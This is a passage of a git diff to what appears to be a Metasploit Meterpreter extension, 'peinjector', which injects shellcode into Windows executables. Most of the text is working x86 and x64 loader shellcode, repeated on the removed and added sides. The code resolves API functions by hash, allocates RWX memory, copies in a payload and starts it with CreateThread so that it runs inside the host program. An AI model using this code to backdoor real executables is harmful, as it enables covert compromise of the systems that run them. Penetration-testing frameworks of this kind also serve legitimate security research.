-                  "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" +	# AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid']
-                  "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" +	# AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid']
-                  "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" +	# AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop']
-                  "\x5D\x90" +	# AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop']
-                  "\xBE"	# AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid']
-
-              thread +=[shellcode.length - 5].pack("V")
-
-              thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" +	# AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000']
-                  "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" +	# AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop']
-                  "\x89\xF1"	# AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi']
-
-              thread += "\xeb\x44"  # <--length of shellcode below	# AUTOMATED ASM: x86 = ['jmp 0x46']
-
-              thread += "\x90\x5e"	# AUTOMATED ASM: x86 = ['nop', 'pop esi']
-
-              thread += "\x90\x90\x90" +	# AUTOMATED ASM: x86 = ['nop', 'nop', 'nop']
-                  "\xF2\xA4" +	# AUTOMATED ASM: x86 = ['repne movsb']
-                  "\xE8\x20\x00\x00" +	# AUTOMATED ASM: x86 = ['invalid']
-                  "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" +	# AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6']
-                  "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" +	# AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid']
-                  "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" +	# AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp']
-                  "\x58\x58\x90\x61"	# AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad']
-
-              thread += "\xe9"	# AUTOMATED ASM: x86 = ['invalid']
-
-              thread += [shellcode.length].pack("V")
-              return stackpreserve + thread + shellcode
-            end
-
-            def add_thread_x64(payload)
-
-              stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" +	# AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8']
-                  "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"	# AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq']
-
-              shellcode = "\xE8\xB8\xFF\xFF\xFF"	# AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd']
-
-              shellcode += payload
-
-              thread = "\x90" +                              # <--THAT'S A NOP. \o/	# AUTOMATED ASM: x64 = ['nop']
-                  "\xe8\xc0\x00\x00\x00" +              # jmp to allocate	# AUTOMATED ASM: x64 = ['call 0xc5']
-                  # api_call
-                  "\x41\x51" +                          # push r9
-                  "\x41\x50" +                          # push r8
-                  "\x52" +                              # push rdx
-                  "\x51" +                              # push rcx
-                  "\x56" +                              # push rsi
-                  "\x48\x31\xD2" +                      # xor rdx,rdx
-                  "\x65\x48\x8B\x52\x60" +              # mov rdx,qword ptr gs:[rdx+96]
-                  "\x48\x8B\x52\x18" +                  # mov rdx,qword ptr [rdx+24]
-                  "\x48\x8B\x52\x20" +                  # mov rdx,qword ptr[rdx+32]
-
-                  # next_mod
-                  "\x48\x8b\x72\x50" +                  # mov rsi,[rdx+80]
-                  "\x48\x0f\xb7\x4a\x4a" +              # movzx rcx,word [rdx+74]
-                  "\x4d\x31\xc9" +                      # xor r9,r9
-
-                  # loop_modname
-                  "\x48\x31\xc0" +                      # xor rax,rax
-                  "\xac" +                              # lodsb
-                  "\x3c\x61" +                          # cmp al, 61h (a)
-                  "\x7c\x02" +                          # jl 02h
-                  "\x2c\x20" +                          # sub al, 0x20
-
-                  # not_lowercase
-                  "\x41\xc1\xc9\x0d" +                  # ror r9d, 13
-                  "\x41\x01\xc1" +                      # add r9d, eax
-                  "\xe2\xed" +                          # loop until read, back to xor rax, rax
-                  "\x52" +                              # push rdx ;Save the current position in the module list
-                  "\x41\x51" +                          # push r9 ; Save the current module hash for later
-                  # ; Proceed to iterate the export address table,
-                  "\x48\x8b\x52\x20" +                  # mov rdx, [rdx+32] ; Get this modules base address
-                  "\x8b\x42\x3c" +                      # mov eax, dword [rdx+60] ; Get PE header
-                  "\x48\x01\xd0" +                      # add rax, rdx ; Add the modules base address
-                  "\x8b\x80\x88\x00\x00\x00" +          # mov eax, dword [rax+136] ; Get export tables RVA
-                  "\x48\x85\xc0" +                      # test rax, rax ; Test if no export address table
-                  "\x74\x67" +                          # je get_next_mod1 ; If no EAT present, process the nex
-                  "\x48\x01\xd0" +                      # add rax, rdx ; Add the modules base address
-                  "\x50" +                              # push rax ; Save the current modules EAT
-                  "\x8b\x48\x18" +                      # mov ecx, dword [rax+24] ; Get the number of function
-                  "\x44\x8b\x40\x20" +                  # mov r8d, dword [rax+32] ; Get the rva of the function
-                  "\x49\x01\xd0" +                      # add r8, rdx ; Add the modules base address
-
-                  # get_next_func: ;
-                  "\xe3\x56" +                          # jrcxz get_next_mod; When we reach the start of the EAT
-                  "\x48\xff\xc9" +                      # dec rcx ; Decrement the function name counter
-                  "\x41\x8b\x34\x88" +                  # mov esi, dword [r8+rcx*4]; Get rva of next module name
-                  "\x48\x01\xd6" +                      # add rsi, rdx ; Add the modules base address
-                  "\x4d\x31\xc9" +                      # xor r9, r9 ; Clear r9 which will store the hash
-                  #  ; And compare it to the one we wan
-                  # loop_funcname: ;
-                  "\x48\x31\xc0" +                     # xor rax, rax ; Clear rax
-                  "\xac" +                             # lodsb ; Read in the next byte of the ASCII funct name
-                  "\x41\xc1\xc9\x0d" +                 # ror r9d, 13 ; Rotate right our hash value
-                  "\x41\x01\xc1" +                     # add r9d, eax ; Add the next byte of the name
-                  "\x38\xe0" +                         # cmp al, ah ; Compare AL to AH (null)
-                  "\x75\xf1" +                         # jne loop_funcname ; continue
-                  "\x4c\x03\x4c\x24\x08" +             # add r9, [rsp+8] ; Add the current module hash
-                  "\x45\x39\xd1" +                     # cmp r9d, r10d ; Compare the hash
-                  "\x75\xd8" +                         # jnz get_next_func ; Go compute the next function hash
-
-                  "\x58" +                             # pop rax ; Restore the current modules EAT
-                  "\x44\x8b\x40\x24" +                 # mov r8d, dword [rax+36] ; Get the ordinal table rva
-                  "\x49\x01\xd0" +                     # add r8, rdx ; Add the modules base address
-                  "\x66\x41\x8b\x0c\x48" +             # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
-                  "\x44\x8b\x40\x1c" +                 # mov r8d, dword [rax+28] ; Get the funct addr table rva
-                  "\x49\x01\xd0" +                     # add r8, rdx ; Add the modules base address
-                  "\x41\x8b\x04\x88" +                 # mov eax, dword [r8+4*rcx]; Get the desired func RVA
-                  "\x48\x01\xd0" +                     # add rax, rdx ; Add the modules base address
-
-                  # finish:
-                  "\x41\x58" +                         # pop r8 ; Clear off the current modules hash
-                  "\x41\x58" +                         # pop r8 ;Clear off the curr position in the module list
-                  "\x5E" +                             # pop rsi ; Restore RSI
-                  "\x59" +                             # pop rcx ; Restore the 1st parameter
-                  "\x5A" +                             # pop rdx ; Restore the 2nd parameter
-                  "\x41\x58" +                         # pop r8 ; Restore the 3rd parameter
-                  "\x41\x59" +                         # pop r9 ; Restore the 4th parameter
-                  "\x41\x5A" +                         # pop r10 ; pop off the return address
-                  "\x48\x83\xEC\x20" +                 # sub rsp, 32 ; reserve space for the register params
-
-                  "\x41\x52" +                         # push r10 ; push back the return address
-                  "\xFF\xE0" +                         # jmp rax ; Jump into the required function
-
-                  # get_next_mod: ;
-                  "\x58" +                             # pop rax ; Pop off the current modules EAT
-
-                  # get_next_mod1: ;
-                  "\x41\x59" +                         # pop r9 ; Pop off the current modules hash
-                  "\x5A" +                             # pop rdx ; Restore our position in the module list
-                  "\x48\x8B\x12" +                     # mov rdx, [rdx] ; Get the next module
-                  "\xe9\x57\xff\xff\xff"               # jmp next_mod ; Process this module
-
-              # allocate
-              thread += "\x5d" +                       # pop rbp
-                  "\x49\xc7\xc6"                       # mov r14, 1abh size of payload...	# AUTOMATED ASM: x64 = ['invalid']
-
-              thread += [shellcode.length - 5].pack("V")
-              thread += "\x6a\x40" +                   # push 40h
-                  "\x41\x59" +                         # pop r9 now 40h
-                  "\x68\x00\x10\x00\x00" +             # push 1000h
-                  "\x41\x58" +                         # pop r8.. now 1000h
-                  "\x4C\x89\xF2" +                     # mov rdx, r14
-                  "\x6A\x00" +                         # push 0
-                  "\x59" +                             # pop rcx
-                  "\x68\x58\xa4\x53\xe5" +             # push E553a458
-                  "\x41\x5A" +                         # pop r10
-                  "\xff\xd5" +                         # call rbp
-                  "\x48\x89\xc3" +                     # mov rbx, rax      ; Store allocated address in ebx
-                  "\x48\x89\xc7"                       # mov rdi, rax      ; Prepare EDI with the new address
-
-
-              thread += "\x48\xc7\xc1"	# AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid']
-              thread += [shellcode.length - 5].pack("V")
-
-              thread += "\xeb\x43"	# AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45']
-
-              # got_payload:
-              thread += "\x5e" +                       # pop rsi            ; Prepare ESI with the source
-                  "\xf2\xa4" +                         # repne movsb        ; Copy the payload to RWX memo
-                  "\xe8\x00\x00\x00\x00" +             # call set_handler   ; Configure error handling
-
-                  # set_handler:
-                  "\x48\x31\xC0" +                     # xor rax,rax
-                  "\x50" +                             # push rax            ; LPDWORD lpThreadId (NULL)
-                  "\x50" +                             # push rax            ; DWORD dwCreationFlags (0)
-                  "\x49\x89\xC1" +                     # mov r9, rax         ; LPVOID lpParameter (NULL)
-                  "\x48\x89\xC2" +                     # mov rdx, rax        ; LPTHREAD_START_ROUTINE  (payload)
-                  "\x49\x89\xD8" +                     # mov r8, rbx         ; SIZE_T dwStackSize (0 for default)
-                  "\x48\x89\xC1" +                     # mov rcx, rax        ; LPSECURITY_ATTRIBUTES (NULL)
-                  "\x49\xC7\xC2\x38\x68\x0D\x16" +     # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
-                  "\xFF\xD5" +                         # call rbp            ; Spawn payload thread
-                  "\x48\x83\xC4\x58" +                 # add rsp, 50
-
-                  # stackrestore
-                  "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" +	# AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9']
-                  "\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"	# AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax']
-
-              thread += "\xe9"	# AUTOMATED ASM: x64 = ['invalid']
-              thread += [shellcode.length].pack("V")
-
-              return stackpreserve + thread + shellcode
-            end
-          end
-        end
-      end
-    end
+module Post
+module Meterpreter
+module Extensions
+module Peinjector
+
+###
+#
+# This meterpreter extensions allow to inject a given shellcode into an executable file.
+#
+###
+class Peinjector < Extension
+
+  def self.extension_id
+    EXTENSION_ID_PEINJECTOR
+  end
+
+  def initialize(client)
+    super(client, 'peinjector')
+
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'peinjector',
+          'ext'  => self
+        }
+      ])
+  end
+
+  def inject_shellcode(opts = {})
+    return nil unless opts[:shellcode]
+
+    request = Packet.create_request(COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE)
+    request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
+    request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
+    request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
+    request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
+
+    response = client.send_request(request)
+
+    error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
+    raise error_msg if error_msg
+    return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
   end
-end
 
+  def add_thread_x86(payload)
+    stackpreserve = "\x90\x90\x60\x9c"	# AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd']
+    shellcode = "\xE8\xB7\xFF\xFF\xFF"	# AUTOMATED ASM: x86 = ['call 0xffffffbc']
+    shellcode += payload
+
+    thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" +	# AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid']
+        "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" +	# AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid']
+        "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" +	# AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61']
+        "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" +	# AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid']
+        "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" +	# AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid']
+        "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" +	# AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx']
+        "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" +	# AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]']
+        "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" +	# AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid']
+        "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" +	# AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid']
+        "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" +	# AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid']
+        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" +	# AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid']
+        "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" +	# AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid']
+        "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" +	# AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop']
+        "\x5D\x90" +	# AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop']
+        "\xBE"	# AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid']
+
+    thread +=[shellcode.length - 5].pack("V")
+
+    thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" +	# AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000']
+        "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" +	# AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop']
+        "\x89\xF1"	# AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi']
+
+    thread += "\xeb\x44"  # <--length of shellcode below	# AUTOMATED ASM: x86 = ['jmp 0x46']
+
+    thread += "\x90\x5e"	# AUTOMATED ASM: x86 = ['nop', 'pop esi']
+
+    thread += "\x90\x90\x90" +	# AUTOMATED ASM: x86 = ['nop', 'nop', 'nop']
+        "\xF2\xA4" +	# AUTOMATED ASM: x86 = ['repne movsb']
+        "\xE8\x20\x00\x00" +	# AUTOMATED ASM: x86 = ['invalid']
+        "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" +	# AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6']
+        "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" +	# AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid']
+        "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" +	# AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp']
+        "\x58\x58\x90\x61"	# AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad']
+
+    thread += "\xe9"	# AUTOMATED ASM: x86 = ['invalid']
+
+    thread += [shellcode.length].pack("V")
+    return stackpreserve + thread + shellcode
+  end
+
+  def add_thread_x64(payload)
+
+    stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" +	# AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8']
+        "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"	# AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq']
+
+    shellcode = "\xE8\xB8\xFF\xFF\xFF"	# AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd']
+
+    shellcode += payload
+
+    thread = "\x90" +                              # <--THAT'S A NOP. \o/	# AUTOMATED ASM: x64 = ['nop']
+        "\xe8\xc0\x00\x00\x00" +              # jmp to allocate	# AUTOMATED ASM: x64 = ['call 0xc5']
+        # api_call
+        "\x41\x51" +                          # push r9
+        "\x41\x50" +                          # push r8
+        "\x52" +                              # push rdx
+        "\x51" +                              # push rcx
+        "\x56" +                              # push rsi
+        "\x48\x31\xD2" +                      # xor rdx,rdx
+        "\x65\x48\x8B\x52\x60" +              # mov rdx,qword ptr gs:[rdx+96]
+        "\x48\x8B\x52\x18" +                  # mov rdx,qword ptr [rdx+24]
+        "\x48\x8B\x52\x20" +                  # mov rdx,qword ptr[rdx+32]
+
+        # next_mod
+        "\x48\x8b\x72\x50" +                  # mov rsi,[rdx+80]
+        "\x48\x0f\xb7\x4a\x4a" +              # movzx rcx,word [rdx+74]
+        "\x4d\x31\xc9" +                      # xor r9,r9
+
+        # loop_modname
+        "\x48\x31\xc0" +                      # xor rax,rax
+        "\xac" +                              # lodsb
+        "\x3c\x61" +                          # cmp al, 61h (a)
+        "\x7c\x02" +                          # jl 02h
+        "\x2c\x20" +                          # sub al, 0x20
+
+        # not_lowercase
+        "\x41\xc1\xc9\x0d" +                  # ror r9d, 13
+        "\x41\x01\xc1" +                      # add r9d, eax
+        "\xe2\xed" +                          # loop until read, back to xor rax, rax
+        "\x52" +                              # push rdx ;Save the current position in the module list
+        "\x41\x51" +                          # push r9 ; Save the current module hash for later
+        # ; Proceed to iterate the export address table,
+        "\x48\x8b\x52\x20" +                  # mov rdx, [rdx+32] ; Get this modules base address
+        "\x8b\x42\x3c" +                      # mov eax, dword [rdx+60] ; Get PE header
+        "\x48\x01\xd0" +                      # add rax, rdx ; Add the modules base address
+        "\x8b\x80\x88\x00\x00\x00" +          # mov eax, dword [rax+136] ; Get export tables RVA
+        "\x48\x85\xc0" +                      # test rax, rax ; Test if no export address table
+        "\x74\x67" +                          # je get_next_mod1 ; If no EAT present, process the nex
+        "\x48\x01\xd0" +                      # add rax, rdx ; Add the modules base address
+        "\x50" +                              # push rax ; Save the current modules EAT
+        "\x8b\x48\x18" +                      # mov ecx, dword [rax+24] ; Get the number of function
+        "\x44\x8b\x40\x20" +                  # mov r8d, dword [rax+32] ; Get the rva of the function
+        "\x49\x01\xd0" +                      # add r8, rdx ; Add the modules base address
+
+        # get_next_func: ;
+        "\xe3\x56" +                          # jrcxz get_next_mod; When we reach the start of the EAT
+        "\x48\xff\xc9" +                      # dec rcx ; Decrement the function name counter
+        "\x41\x8b\x34\x88" +                  # mov esi, dword [r8+rcx*4]; Get rva of next module name
+        "\x48\x01\xd6" +                      # add rsi, rdx ; Add the modules base address
+        "\x4d\x31\xc9" +                      # xor r9, r9 ; Clear r9 which will store the hash
+        #  ; And compare it to the one we wan
+        # loop_funcname: ;
+        "\x48\x31\xc0" +                     # xor rax, rax ; Clear rax
+        "\xac" +                             # lodsb ; Read in the next byte of the ASCII funct name
+        "\x41\xc1\xc9\x0d" +                 # ror r9d, 13 ; Rotate right our hash value
+        "\x41\x01\xc1" +                     # add r9d, eax ; Add the next byte of the name
+        "\x38\xe0" +                         # cmp al, ah ; Compare AL to AH (null)
+        "\x75\xf1" +                         # jne loop_funcname ; continue
+        "\x4c\x03\x4c\x24\x08" +             # add r9, [rsp+8] ; Add the current module hash
+        "\x45\x39\xd1" +                     # cmp r9d, r10d ; Compare the hash
+        "\x75\xd8" +                         # jnz get_next_func ; Go compute the next function hash
+
+        "\x58" +                             # pop rax ; Restore the current modules EAT
+        "\x44\x8b\x40\x24" +                 # mov r8d, dword [rax+36] ; Get the ordinal table rva
+        "\x49\x01\xd0" +                     # add r8, rdx ; Add the modules base address
+        "\x66\x41\x8b\x0c\x48" +             # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
+        "\x44\x8b\x40\x1c" +                 # mov r8d, dword [rax+28] ; Get the funct addr table rva
+        "\x49\x01\xd0" +                     # add r8, rdx ; Add the modules base address
+        "\x41\x8b\x04\x88" +                 # mov eax, dword [r8+4*rcx]; Get the desired func RVA
+        "\x48\x01\xd0" +                     # add rax, rdx ; Add the modules base address
+
+        # finish:
+        "\x41\x58" +                         # pop r8 ; Clear off the current modules hash
+        "\x41\x58" +                         # pop r8 ;Clear off the curr position in the module list
+        "\x5E" +                             # pop rsi ; Restore RSI
+        "\x59" +                             # pop rcx ; Restore the 1st parameter
+        "\x5A" +                             # pop rdx ; Restore the 2nd parameter
+        "\x41\x58" +                         # pop r8 ; Restore the 3rd parameter
+        "\x41\x59" +                         # pop r9 ; Restore the 4th parameter
+        "\x41\x5A" +                         # pop r10 ; pop off the return address
+        "\x48\x83\xEC\x20" +                 # sub rsp, 32 ; reserve space for the register params
+
+        "\x41\x52" +                         # push r10 ; push back the return address
+        "\xFF\xE0" +                         # jmp rax ; Jump into the required function
+
+        # get_next_mod: ;
+        "\x58" +                             # pop rax ; Pop off the current modules EAT
+
+        # get_next_mod1: ;
+        "\x41\x59" +                         # pop r9 ; Pop off the current modules hash
+        "\x5A" +                             # pop rdx ; Restore our position in the module list
+        "\x48\x8B\x12" +                     # mov rdx, [rdx] ; Get the next module
+        "\xe9\x57\xff\xff\xff"               # jmp next_mod ; Process this module
+
+    # allocate
+    thread += "\x5d" +                       # pop rbp
+        "\x49\xc7\xc6"                       # mov r14, 1abh size of payload...	# AUTOMATED ASM: x64 = ['invalid']
+
+    thread += [shellcode.length - 5].pack("V")
+    thread += "\x6a\x40" +                   # push 40h
+        "\x41\x59" +                         # pop r9 now 40h
+        "\x68\x00\x10\x00\x00" +             # push 1000h
+        "\x41\x58" +                         # pop r8.. now 1000h
+        "\x4C\x89\xF2" +                     # mov rdx, r14
+        "\x6A\x00" +                         # push 0
+        "\x59" +                             # pop rcx
+        "\x68\x58\xa4\x53\xe5" +             # push E553a458
+        "\x41\x5A" +                         # pop r10
+        "\xff\xd5" +                         # call rbp
+        "\x48\x89\xc3" +                     # mov rbx, rax      ; Store allocated address in ebx
+        "\x48\x89\xc7"                       # mov rdi, rax      ; Prepare EDI with the new address
+
+
+    thread += "\x48\xc7\xc1"	# AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid']
+    thread += [shellcode.length - 5].pack("V")
+
+    thread += "\xeb\x43"	# AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45']
+
+    # got_payload:
+    thread += "\x5e" +                       # pop rsi            ; Prepare ESI with the source
+        "\xf2\xa4" +                         # repne movsb        ; Copy the payload to RWX memo
+        "\xe8\x00\x00\x00\x00" +             # call set_handler   ; Configure error handling
+
+        # set_handler:
+        "\x48\x31\xC0" +                     # xor rax,rax
+        "\x50" +                             # push rax            ; LPDWORD lpThreadId (NULL)
+        "\x50" +                             # push rax            ; DWORD dwCreationFlags (0)
+        "\x49\x89\xC1" +                     # mov r9, rax         ; LPVOID lpParameter (NULL)
+        "\x48\x89\xC2" +                     # mov rdx, rax        ; LPTHREAD_START_ROUTINE  (payload)
+        "\x49\x89\xD8" +                     # mov r8, rbx         ; SIZE_T dwStackSize (0 for default)
+        "\x48\x89\xC1" +                     # mov rcx, rax        ; LPSECURITY_ATTRIBUTES (NULL)
+        "\x49\xC7\xC2\x38\x68\x0D\x16" +     # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
+        "\xFF\xD5" +                         # call rbp            ; Spawn payload thread
+        "\x48\x83\xC4\x58" +                 # add rsp, 50
+
+        # stackrestore
+        "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" +	# AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9']
+        "\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"	# AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax']
+
+    thread += "\xe9"	# AUTOMATED ASM: x64 = ['invalid']
+    thread += [shellcode.length].pack("V")
+
+    return stackpreserve + thread + shellcode
+  end
+end
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
index db1a06e1d501b..117d079132b99 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
@@ -5,12 +5,17 @@ module Meterpreter
 module Extensions
 module Peinjector
 
-TLV_TYPE_PEINJECTOR_SHELLCODE             = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
-TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE        = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
